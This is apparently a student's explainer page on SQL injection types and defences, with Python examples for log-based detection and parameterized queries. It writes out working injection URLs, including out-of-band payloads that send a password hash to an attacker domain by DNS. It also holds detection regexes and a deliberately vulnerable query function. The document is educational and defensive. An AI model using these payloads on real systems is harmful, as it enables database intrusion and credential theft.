# <h1 style="color:#312392;">**What is SQL injection (SQLi)?**</h1>

<p style="font-size:18px;">SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. This can allow an attacker to view data that they are not normally able to retrieve. This might include data that belongs to other users, or any other data that the application can access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior. In some situations, an attacker can escalate a SQL injection attack to compromise the underlying server or other back-end infrastructure. It can also enable them to perform denial-of-service attacks.</p>

<img src="https://www.kratikal.com/blog/wp-content/uploads/2020/06/sQL-.png" alt="SQL injection" style="box-shadow: 5px 7px 20px #8888;">

# <h1 style="color:#312392;">**The Different Types of SQL Injection Vulnerability:**</h1>

<div style="font-size:18px">
Attackers can exfiltrate data from servers by exploiting SQL Injection vulnerabilities in various ways. Common methods include retrieving data based on errors, conditions (true/false), and timing.
<ul>
<li>Error-Based SQL Injection:<br>When exploiting an error-based SQL Injection vulnerability, attackers can retrieve information such as table names and content from visible database errors.</li>
</ul>
<h6>Error-Based SQL Injection Example:</h6>
<code>https://example.com/index.php?id=1+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)</code>
<br>
This request returned an error:<br>
<code>Duplicate entry 'database1' for key 'group_key'</code>
<br>
The same method works for table names and content. Disabling error messages on production systems helps to prevent attackers from gathering such information.
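From the defender's side, the four request shapes this section describes (the error-based `information_schema` / `floor(rand())` query above, and the boolean, `sleep()` and `LOAD_FILE` probes covered by the following items) leave recognizable traces in web-server logs. The Python below is an added example, not code from the original page: it parses constructed combined-format access-log lines (the IP address, timestamps and requests are made up for the example), URL-decodes each query string, tags it with the indicator category it matches, and pairs consecutive boolean probes whose response sizes differ, which is the true/false signal the boolean-based item relies on.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines (not real traffic). The requests
# reproduce the payload shapes quoted in this section against a fictional host.
SAMPLE_LOG = r"""
203.0.113.5 - - [10/Jun/2023:10:00:01 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512
203.0.113.5 - - [10/Jun/2023:10:00:02 +0000] "GET /index.php?id=1+AND+1=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Jun/2023:10:00:03 +0000] "GET /index.php?id=1+AND+1=2 HTTP/1.1" 200 87
203.0.113.5 - - [10/Jun/2023:10:00:04 +0000] "GET /index.php?id=1+AND+IF(version()+LIKE+'5%25',sleep(3),false) HTTP/1.1" 200 512
203.0.113.5 - - [10/Jun/2023:10:00:09 +0000] "GET /index.php?id=1+and(select+1+FROM(select+count(*),concat(database(),floor(rand(0)*2))x+FROM+information_schema.tables+GROUP+BY+x)a) HTTP/1.1" 500 1024
203.0.113.5 - - [10/Jun/2023:10:00:10 +0000] "GET /index.php?id=1+AND+(SELECT+LOAD_FILE(concat('\\\\',(SELECT+@@version),'example.com\\'))) HTTP/1.1" 200 512
"""

# One combined-log line: client IP, timestamp, request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+)'
)

# Indicator patterns, matched against the URL-decoded query string. Each one
# corresponds to an injection type described in this section.
INDICATORS = {
    # Boolean-based probes: a tautology or contradiction such as "AND 1=1" / "AND 1=2".
    "boolean": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    # Time-based probes: a delay call such as sleep(3).
    "time": re.compile(r"\bsleep\s*\(", re.I),
    # Error-based probes: catalog reads and the floor(rand()) GROUP BY trick.
    "error": re.compile(r"information_schema|floor\s*\(\s*rand\s*\(", re.I),
    # Out-of-band probes: file/UNC primitives that trigger outbound lookups.
    "oob": re.compile(r"load_file\s*\(|\bxp_\w+", re.I),
}


def parse_line(line):
    """Split one log line into fields; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = int(rec["size"])
    # Decode '+' and %XX so the patterns see what the database would see.
    rec["query"] = unquote_plus(rec["target"].partition("?")[2])
    return rec


def classify(query):
    """Return the sorted indicator categories present in a decoded query string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(query))


def scan_log(text):
    """Return (line_no, ip, categories) for every line that carries an indicator."""
    findings = []
    for line_no, line in enumerate(text.strip().splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        cats = classify(rec["query"])
        if cats:
            findings.append((line_no, rec["ip"], cats))
    return findings


def boolean_oracle_pairs(text):
    """Consecutive boolean probes from one IP whose response sizes differ.

    A different page size for the 'true' and 'false' condition is exactly the
    oracle a boolean-based injection needs, so such pairs deserve an alert.
    """
    records = [r for r in (parse_line(l) for l in text.strip().splitlines()) if r]
    pairs = []
    for a, b in zip(records, records[1:]):
        if (a["ip"] == b["ip"] and "boolean" in classify(a["query"])
                and "boolean" in classify(b["query"]) and a["size"] != b["size"]):
            pairs.append((a["query"], b["query"], a["size"], b["size"]))
    return pairs


if __name__ == "__main__":
    for line_no, ip, cats in scan_log(SAMPLE_LOG):
        print(f"line {line_no} from {ip}: {', '.join(cats)}")
    for true_q, false_q, true_size, false_size in boolean_oracle_pairs(SAMPLE_LOG):
        print(f"boolean oracle: {true_q!r} -> {true_size} bytes, {false_q!r} -> {false_size} bytes")
```

The size comparison in `boolean_oracle_pairs` is the part worth keeping in a real pipeline: a single `AND 1=1` in a query string is easy to spot, but the pair of requests that differ only in the condition and produce different-sized responses is what confirms the parameter is actually acting as an oracle. Time-based probes need the same treatment with response latency, which the combined log format does not record.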
<ul>
<li>Boolean-Based SQL Injection:<br>Sometimes there is no visible error message on the page when a SQL query fails, making it difficult for an attacker to get information from the vulnerable application. However, there is still a way to extract information.
<h6>When a SQL query fails, sometimes some parts of the web page disappear or change, or the entire website can fail to load. These indications allow attackers to determine whether the input parameter is vulnerable and whether it allows extraction of data.<br>Attackers can test for this by inserting a condition into a SQL query:</h6>
<code>https://example.com/index.php?id=1+AND+1=1</code>
<h6>If the page loads as usual, it might indicate that it is vulnerable to a SQL Injection. To be sure, an attacker typically tries to provoke a false result using something like this:</h6>
<code>https://example.com/index.php?id=1+AND+1=2</code>
</li>
</ul>
<ul>
<li>Time-Based SQL Injection:<br>In some cases, even though a vulnerable SQL query does not have any visible effect on the output of the page, it may still be possible to extract information from an underlying database. Hackers determine this by instructing the database to wait (sleep) a stated amount of time before responding. If the page is not vulnerable, it will load quickly; if it is vulnerable, it will take longer than usual to load. This enables hackers to extract data even though there are no visible changes on the page. The SQL syntax can be similar to the one used in the Boolean-Based SQL Injection vulnerability.
<h6>But to set a measurable sleep time, the 'true' branch of the condition is replaced with something that takes time to execute, such as 'sleep(3)', which instructs the database to sleep for three seconds:</h6>
<code>https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false)</code>
<br>
If the page takes longer than usual to load, it is safe to assume that the database version is 5.X.
</li>
</ul>
<ul>
<li>Out-of-Band SQL Injection Vulnerability:<br>Sometimes the only way an attacker can retrieve information from a database is to use out-of-band techniques. Usually, these types of attacks involve sending the data directly from the database server to a machine that is controlled by the attacker. Attackers may use this method if an injection does not occur directly after the supplied data is inserted, but at a later point in time.
<h6>Out-of-Band Example:</h6>
<code>https://example.com/index.php?id=1+AND+(SELECT+LOAD_FILE(concat('\\\\',(SELECT @@version),'example.com\\')))</code>
<br>
<code>https://www.example.com/index.php?query=declare @pass nvarchar(100);SELECT @pass=(SELECT TOP 1 password_hash FROM users);exec('xp_fileexist ''\\' + @pass + '.example.com\c$\boot.ini''')</code>
<br>
In these requests, the target makes a DNS request to the attacker-owned domain, with the query result inside the subdomain. This means that an attacker does not need to see the result of the injection, but can wait until the database server sends a request instead.
</li>
</ul>
</div>

# <h1 style="color:#312392;">**The impact of a successful SQL injection attack:**</h1>

<p style="font-size:18px;">A successful SQL injection attack can result in unauthorized access to sensitive data, such as:</p>
<ul style="font-size:18px">
<li>Passwords.</li>
<li>Credit card details.</li>
<li>Personal user information.</li>
</ul>
<p style="font-size:18px;">SQL injection attacks have been used in many high-profile data breaches over the years. These have caused reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period.
</p>

# <h1 style="color:#312392;">**Preventing SQL injection attacks:**</h1>

<div style="font-size:18px">
<ul>
<li>Parameterized Statements (Prepared Statements):<br>Use parameterized statements (prepared statements) in your database queries. These mechanisms separate SQL code from user input, significantly reducing the risk of injecting malicious SQL code. This practice is especially prevalent in languages like Java, where you can use the JDBC API.</li>
</ul>
<h6>Example (Java):</h6>
<pre>
// connection is an existing java.sql.Connection. The ? placeholders are bound
// to values, so the user-provided strings are never parsed as SQL.
String sql = "SELECT * FROM users WHERE username = ? AND password = ?";
PreparedStatement statement = connection.prepareStatement(sql);
statement.setString(1, userProvidedUsername);
statement.setString(2, userProvidedPassword);
ResultSet result = statement.executeQuery();
</pre>
<ul>
<li>Input Validation and Sanitization:<br>Implement rigorous input validation to ensure that user inputs adhere to expected formats and data types. Reject any input that does not meet the defined validation criteria. Additionally, employ input sanitization techniques to eliminate or escape potentially harmful characters.</li>
</ul>
<h6>Example (PHP):</h6>
<pre>
// $conn is an open mysqli connection. Escaping only protects values that are
// placed inside quoted string literals in the query.
$username = mysqli_real_escape_string($conn, $_POST['username']);
$password = mysqli_real_escape_string($conn, $_POST['password']);
</pre>
<ul>
<li>Least Privilege Principle:<br>Adhere to the principle of least privilege when configuring the database accounts used by your web application. Limit the permissions of these accounts to the bare minimum required for their designated functions. This practice reduces the potential impact of a successful SQL injection attack.</li>
</ul>
<ul>
<li>Stored Procedures:<br>Use stored procedures to encapsulate SQL logic within the database. By doing so, you restrict the execution of arbitrary SQL code and improve the overall security posture.
This is especially effective in database systems like SQL Server.</li>
</ul>
<h6>Example (SQL Server):</h6>
<pre>
-- @username is bound as a parameter. A procedure that built dynamic SQL from it
-- with EXEC would reintroduce the injection.
CREATE PROCEDURE GetUser @username NVARCHAR(50)
AS
    SELECT * FROM users WHERE username = @username;
</pre>
<ul>
<li>ORMs (Object-Relational Mapping):<br>Consider employing Object-Relational Mapping (ORM) frameworks that automate the process of parameterization and escaping user inputs. ORM frameworks abstract away low-level SQL interactions, providing a higher level of security by minimizing the need for manual query construction.</li>
</ul>
<h6>Example (Django, Python):</h6>
<pre>
# The ORM turns the keyword arguments into bound parameters of the generated query.
users = User.objects.filter(username=userProvidedUsername, password=userProvidedPassword)
</pre>
</div>

<hr>

<p style="color:gray; text-align:center;font-weight:bold; background-color:#deffff;margin-bottom:0px">Network Security<br>Name : Qusay M. Alfarra<br>ID : 120190166<br>T.A : Eng. Hussien K. Abu Eliewa</p>
<h6 style="text-align:center; background-color:#deffff; padding:0px; margin-top:0px; padding-bottom:8px">Copyright © 2023</h6>
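The prevention section above lists parameterized statements, input validation and least privilege as separate measures. The Python below is an added example, not code from the original page, that puts them side by side using the standard library's `sqlite3` module: a query built by string concatenation next to its parameterized form (the equivalent of the Java `PreparedStatement`), an allow-list validator for the username field, and SQLite's `query_only` pragma standing in for a read-only, least-privilege database account. The in-memory `users` table, its rows and the probe input `x' OR 1=1 --` are constructed for the example.

```python
import re
import sqlite3

# Allow-list for a username: letters, digits, '_', '.', '-', between 1 and 32 characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def make_db():
    """Constructed in-memory stand-in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    return conn


def find_user_vulnerable(conn, username):
    """Vulnerable form: the value is pasted into the SQL text and parsed as code.

    With username = "x' OR 1=1 --" the WHERE clause becomes
    username = 'x' OR 1=1 --'   and every row is returned.
    """
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Parameterized form: the statement text is fixed; the value travels separately.

    The same probe string is compared literally against the column and matches nothing.
    """
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def is_valid_username(value):
    """Allow-list validation: True only if the whole value matches USERNAME_RE."""
    return USERNAME_RE.fullmatch(value) is not None


def validate_username(value):
    """Reject input that fails validation before it reaches the database."""
    if not is_valid_username(value):
        raise ValueError("username does not match the expected format")
    return value


def make_readonly(conn):
    """Stand-in for a least-privilege account: this connection may only read.

    SQLite has no user accounts, so the query_only pragma models a DB user that
    was granted SELECT but not INSERT/UPDATE/DELETE.
    """
    conn.execute("PRAGMA query_only = 1")
    return conn


def can_write(conn):
    """True if a DELETE is accepted on this connection, False if it is refused."""
    try:
        conn.execute("DELETE FROM users WHERE username = 'bob'")
        return True
    except sqlite3.OperationalError:
        return False


if __name__ == "__main__":
    probe = "x' OR 1=1 --"  # constructed tautology input, not a real credential
    conn = make_db()
    print("vulnerable:", find_user_vulnerable(conn, probe))   # every row comes back
    print("parameterized:", find_user_safe(conn, probe))      # no such username: []
    print("validated:", is_valid_username(probe))             # False: rejected up front
    print("read-only connection can write:", can_write(make_readonly(make_db())))
```

The layering matters: parameterization is the control that actually stops the query text from changing, validation keeps obviously malformed input out of the application entirely, and the read-only connection bounds what a query that does slip through can do. Escaping, as in the PHP example above, only helps when the escaped value sits inside a quoted string literal, so it is a fallback rather than a replacement for bound parameters.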